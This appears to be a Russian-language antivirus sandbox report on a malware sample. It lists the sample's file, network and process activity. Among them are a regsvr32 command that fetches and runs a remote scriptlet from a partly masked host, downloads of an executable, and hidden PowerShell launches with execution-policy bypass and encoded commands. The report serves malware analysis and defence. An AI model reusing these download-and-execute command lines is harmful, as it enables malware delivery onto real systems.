Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\regsvr32.exe' /s -n /u -i:http://lf###hosi.co.in///test.sct SCrObj.DLl
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wdm.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://lf###hosi.co.in///test.sct
- http://lf###hosi.co.in///og.exe
UDP
- DNS ASK lf###hosi.co.in
Другое
Создает и запускает на исполнение
- '%APPDATA%\wdm.exe'
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAMQA0AC4AMAAiAAkACQAgACwAIA...
